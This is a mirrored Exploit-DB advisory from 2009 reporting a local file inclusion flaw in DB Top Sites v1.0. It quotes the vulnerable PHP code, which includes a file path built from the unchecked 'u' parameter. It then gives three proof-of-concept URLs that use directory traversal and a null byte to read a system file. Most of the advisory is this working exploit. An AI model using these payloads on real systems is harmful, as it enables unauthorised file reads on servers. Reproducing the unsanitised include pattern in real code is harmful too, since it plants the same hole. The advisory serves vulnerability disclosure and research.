bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/8952.txt
Offensive Security b4c96a5864 DB: 2021-09-03 
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

30 lines
No EOL
1,011 B
Text
Raw Blame History

######################################################################
[+] DB Top Sites v1.0 (index.php u) Local File Inclusion Vulnerability
[+] Discovered By SirGod
[+] www.mortal-team.org
#######################################################################
[+] Local File Inclusion
- Vulnerable code is everywhere
-------------------------------------------------------------------------------------------------------
if ( $u != "" ) {
if ( file_exists( "./sites/session/$u.session.php" ) ){
include "./sites/session/$u.session.php";
include "./sites/$u.php";
-------------------------------------------------------------------------------------------------------
- PoC's
http://127.0.0.1/[path]/full.php?u=../../../../../../BOOTSECT.BAK%00
http://127.0.0.1/[path]/index.php?u=../../../../../../BOOTSECT.BAK%00
http://127.0.0.1/[path]/contact.php?u=../../../../../../BOOTSECT.BAK%00
#######################################################################
# milw0rm.com [2009-06-15]
Reference in a new issue View git blame Copy permalink